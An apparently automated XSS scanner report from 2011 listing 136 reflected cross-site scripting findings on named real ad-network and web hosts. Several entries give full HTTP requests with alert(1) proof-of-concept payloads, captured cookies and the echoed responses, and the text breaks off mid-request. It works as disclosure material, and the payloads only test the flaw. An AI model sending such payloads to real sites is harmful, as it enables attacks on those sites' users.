XSS, Cross Site Scripting, DORK, CWE-79, CAPEC-86, PoC Report

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Tue Mar 08 07:08:32 CST 2011.


The DORK Report

Loading

1. Cross-site scripting (reflected)

1.1. http://a.collective-media.net/ad/cm.merriamwebster/ron_010110 [REST URL parameter 1]

1.2. http://a.collective-media.net/adj/cm.merriamwebster/ron_010110 [REST URL parameter 2]

1.3. http://a.collective-media.net/adj/cm.merriamwebster/ron_010110 [REST URL parameter 3]

1.4. http://a.collective-media.net/adj/cm.merriamwebster/ron_010110 [name of an arbitrarily supplied request parameter]

1.5. http://a.collective-media.net/adj/cm.merriamwebster/ron_010110 [sz parameter]

1.6. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [adurl parameter]

1.7. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [ai parameter]

1.8. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [client parameter]

1.9. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [num parameter]

1.10. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sig parameter]

1.11. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sz parameter]

1.12. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_adid parameter]

1.13. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_id parameter]

1.14. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_uuid parameter]

1.15. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [redirect parameter]

1.16. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [sz parameter]

1.17. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_adid parameter]

1.18. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_adid parameter]

1.19. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_id parameter]

1.20. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_id parameter]

1.21. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_uuid parameter]

1.22. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_uuid parameter]

1.23. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [redirect parameter]

1.24. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [redirect parameter]

1.25. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [sz parameter]

1.26. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [sz parameter]

1.27. http://ad.doubleclick.net/adj/syn.embarq/footer [name of an arbitrarily supplied request parameter]

1.28. http://ad.doubleclick.net/adj/test.gmaps/business [dc_ref parameter]

1.29. http://ad.doubleclick.net/adj/test.gmaps/business [name of an arbitrarily supplied request parameter]

1.30. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

1.31. http://ad3.liverail.com/ [name of an arbitrarily supplied request parameter]

1.32. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

1.33. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

1.34. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

1.35. http://admeld.adnxs.com/usersync [admeld_callback parameter]

1.36. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

1.37. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

1.38. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

1.39. http://ads.pointroll.com/PortalServe/ [r parameter]

1.40. http://ads.pointroll.com/PortalServe/ [redir parameter]

1.41. http://ads.pointroll.com/PortalServe/ [time parameter]

1.42. http://ak.quantcast.com/css/ie6.css [REST URL parameter 1]

1.43. http://ak.quantcast.com/css/ie6.css [REST URL parameter 2]

1.44. http://ak.quantcast.com/css/ie7.css [REST URL parameter 1]

1.45. http://ak.quantcast.com/css/ie7.css [REST URL parameter 2]

1.46. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 1]

1.47. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 2]

1.48. http://ak.quantcast.com/js/concat.js [REST URL parameter 1]

1.49. http://ak.quantcast.com/js/concat.js [REST URL parameter 2]

1.50. http://api-public.addthis.com/url/shares.json [callback parameter]

1.51. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

1.52. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

1.53. http://api.dimestore.com/viapi [id parameter]

1.54. http://ar.voicefive.com/b/rc.pli [func parameter]

1.55. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.56. http://b.scorecardresearch.com/beacon.js [c10 parameter]

1.57. http://b.scorecardresearch.com/beacon.js [c15 parameter]

1.58. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.59. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.60. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.61. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.62. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.63. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 2]

1.64. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 3]

1.65. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 4]

1.66. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 5]

1.67. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 6]

1.68. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 7]

1.69. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 2]

1.70. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 3]

1.71. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 4]

1.72. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 5]

1.73. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 6]

1.74. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 7]

1.75. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 2]

1.76. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 3]

1.77. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 4]

1.78. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 5]

1.79. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 6]

1.80. http://b3.mookie1.com/2/ZapTraderB3/NatureMade/Geo_2011Q1/P/300/11299524221@x90 [REST URL parameter 7]

1.81. http://blekko.com/autocomplete [query parameter]

1.82. http://blekko.com/ws/+collegehumor.com+/ddgapi [REST URL parameter 3]

1.83. http://blekko.com/ws/+elbo.ws+/ddgapi [REST URL parameter 3]

1.84. http://blekko.com/ws/+nick.com+/ddgapi [REST URL parameter 3]

1.85. http://blekko.com/ws/elbo.ws+/visualize [REST URL parameter 3]

1.86. http://blekko.com/ws/http:%2F%2Fcloudscan.me+/seo [REST URL parameter 3]

1.87. http://blekko.com/ws/http:%2F%2Fcloudscan.us+/seo [REST URL parameter 3]

1.88. http://blekko.com/ws/http:%2F%2Felbo.ws%2F+/seo [REST URL parameter 3]

1.89. http://blekko.com/ws/http:%2F%2Fxss.cx+/seo [REST URL parameter 3]

1.90. http://blekko.com/ws/http://elbo.ws/+/duptext [REST URL parameter 5]

1.91. http://blekko.com/ws/http://elbo.ws/+/sections [REST URL parameter 5]

1.92. http://blekko.com/ws/http://elbo.ws/+/urlseo [REST URL parameter 5]

1.93. http://blekko.com/ws/http://elbo.ws/+/visualize [REST URL parameter 5]

1.94. http://community.bomgar.com/index.php [REST URL parameter 1]

1.95. http://community.npr.org/ver1.0/Direct/Jsonp [cb parameter]

1.96. http://control.adap.tv/control [as parameter]

1.97. http://control.adap.tv/control [categories parameter]

1.98. http://control.adap.tv/control [companionId parameter]

1.99. http://control.adap.tv/control [description parameter]

1.100. http://control.adap.tv/control [duration parameter]

1.101. http://control.adap.tv/control [eov parameter]

1.102. http://control.adap.tv/control [height parameter]

1.103. http://control.adap.tv/control [id parameter]

1.104. http://control.adap.tv/control [isTop parameter]

1.105. http://control.adap.tv/control [keywords parameter]

1.106. http://control.adap.tv/control [name of an arbitrarily supplied request parameter]

1.107. http://control.adap.tv/control [pageUrl parameter]

1.108. http://control.adap.tv/control [sessionId parameter]

1.109. http://control.adap.tv/control [title parameter]

1.110. http://control.adap.tv/control [url parameter]

1.111. http://control.adap.tv/control [width parameter]

1.112. http://control.adap.tv/control [zid parameter]

1.113. http://desk.opt.fimserve.com/adopt/ [sz parameter]

1.114. http://digg.com/submit [REST URL parameter 1]

1.115. http://dm.de.mookie1.com/2/B3DM/2010DM/1379918009@x23 [REST URL parameter 2]

1.116. http://dm.de.mookie1.com/2/B3DM/2010DM/1379918009@x23 [REST URL parameter 3]

1.117. http://dm.de.mookie1.com/2/B3DM/2010DM/1379918009@x23 [REST URL parameter 4]

1.118. http://dm.de.mookie1.com/2/B3DM/2010DM/1379918009@x23 [name of an arbitrarily supplied request parameter]

1.119. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [REST URL parameter 2]

1.120. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [REST URL parameter 3]

1.121. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [REST URL parameter 4]

1.122. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [USNetwork/Dell_Streak11Q1_Max_Demo_160 parameter]

1.123. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [name of an arbitrarily supplied request parameter]

1.124. http://domainnamesales.com/lcontact/ [name of an arbitrarily supplied request parameter]

1.125. http://ds.addthis.com/red/psi/sites/www.kenexa.com/p.json [callback parameter]

1.126. http://ds.addthis.com/red/psi/sites/www.metrolyrics.com/p.json [callback parameter]

1.127. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

1.128. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

1.129. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

1.130. http://ar.voicefive.com/bmx3/broker.pli [ar_p39750809 cookie]

1.131. http://ar.voicefive.com/bmx3/broker.pli [ar_p58096422 cookie]

1.132. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

1.133. http://ar.voicefive.com/bmx3/broker.pli [ar_p84053757 cookie]

1.134. http://bullhorn.app6.hubspot.com/salog.js.aspx [hubspotutk cookie]

1.135. http://bullhorn.com/ [Referer HTTP header]

1.136. http://bullhorn.com/newsrelease-details.php [Referer HTTP header]



1. Cross-site scripting (reflected)
There are 136 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.



1.1. http://a.collective-media.net/ad/cm.merriamwebster/ron_010110 [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/cm.merriamwebster/ron_010110

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f10a2<script>alert(1)</script>53d79e419f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adf10a2<script>alert(1)</script>53d79e419f3/cm.merriamwebster/ron_010110 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal-sea; dp2=1; apnx=1; qcms=1; rdst12=1; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; cli=11e4f07c0988ac7; nadp=1; mmpg=1; targ=1; rdst11=1; qcdp=1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 86
Date: Tue, 08 Mar 2011 11:59:13 GMT
Connection: close

unknown path /adf10a2<script>alert(1)</script>53d79e419f3/cm.merriamwebster/ron_010110

1.2. http://a.collective-media.net/adj/cm.merriamwebster/ron_010110 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.merriamwebster/ron_010110

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6c7a'-alert(1)-'d8ef1576c28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.merriamwebsterf6c7a'-alert(1)-'d8ef1576c28/ron_010110;sz=728x90;ord=459401240? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_728_TOP&groupid=5332614444&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; rdst11=1; rdst12=1; dp2=1; nadp=1; targ=1; apnx=1; qcms=1; qcdp=1; mmpg=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Vary: Accept-Encoding
Date: Mon, 07 Mar 2011 00:56:44 GMT
Connection: close
Set-Cookie: dc=dal-dc-sea; domain=collective-media.net; path=/; expires=Wed, 06-Apr-2011 00:56:44 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.merriamwebsterf6c7a'-alert(1)-'d8ef1576c28/ron_010110;sz=728x90;net=cm;ord=459401240;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.3. http://a.collective-media.net/adj/cm.merriamwebster/ron_010110 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.merriamwebster/ron_010110

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 243d1'-alert(1)-'a765c13a6fe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.merriamwebster/ron_010110243d1'-alert(1)-'a765c13a6fe;sz=728x90;ord=459401240? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_728_TOP&groupid=5332614444&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; rdst11=1; rdst12=1; dp2=1; nadp=1; targ=1; apnx=1; qcms=1; qcdp=1; mmpg=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Date: Mon, 07 Mar 2011 00:56:45 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc-dal-sea; domain=collective-media.net; path=/; expires=Wed, 06-Apr-2011 00:56:45 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.merriamwebster/ron_010110243d1'-alert(1)-'a765c13a6fe;sz=728x90;net=cm;ord=459401240;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.4. http://a.collective-media.net/adj/cm.merriamwebster/ron_010110 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.merriamwebster/ron_010110

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload effe1'-alert(1)-'8cb31a19829 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.merriamwebster/ron_010110;sz=728x90;ord=459401240?&effe1'-alert(1)-'8cb31a19829=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_728_TOP&groupid=5332614444&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; rdst11=1; rdst12=1; dp2=1; nadp=1; targ=1; apnx=1; qcms=1; qcdp=1; mmpg=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 458
Vary: Accept-Encoding
Date: Mon, 07 Mar 2011 00:56:44 GMT
Connection: close
Set-Cookie: dc=dal-dc-sea; domain=collective-media.net; path=/; expires=Wed, 06-Apr-2011 00:56:44 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.merriamwebster/ron_010110;sz=728x90;net=cm;ord=459401240?&effe1'-alert(1)-'8cb31a19829=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.5. http://a.collective-media.net/adj/cm.merriamwebster/ron_010110 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.merriamwebster/ron_010110

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e194e'-alert(1)-'1da20828cff was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.merriamwebster/ron_010110;sz=728x90;ord=459401240?e194e'-alert(1)-'1da20828cff HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_728_TOP&groupid=5332614444&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; rdst11=1; rdst12=1; dp2=1; nadp=1; targ=1; apnx=1; qcms=1; qcdp=1; mmpg=1; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Vary: Accept-Encoding
Date: Mon, 07 Mar 2011 00:56:44 GMT
Connection: close
Set-Cookie: dc=dal-dc-sea; domain=collective-media.net; path=/; expires=Wed, 06-Apr-2011 00:56:44 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.merriamwebster/ron_010110;sz=728x90;net=cm;ord=459401240?e194e'-alert(1)-'1da20828cff;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.6. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e36a2"-alert(1)-"60de33534d4 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=e36a2"-alert(1)-"60de33534d4 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7082
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Mar 2011 13:16:17 GMT
Expires: Mon, 07 Mar 2011 13:16:17 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
eHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=e36a2"-alert(1)-"60de33534d4http://ads.networksolutions.com/landing?code=P99C519S512N0B2A1D38E0000V109");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never
...[SNIP]...

1.7. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8e24"-alert(1)-"68e3df219f9 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxAa8e24"-alert(1)-"68e3df219f9&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=;ord=1467384676? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
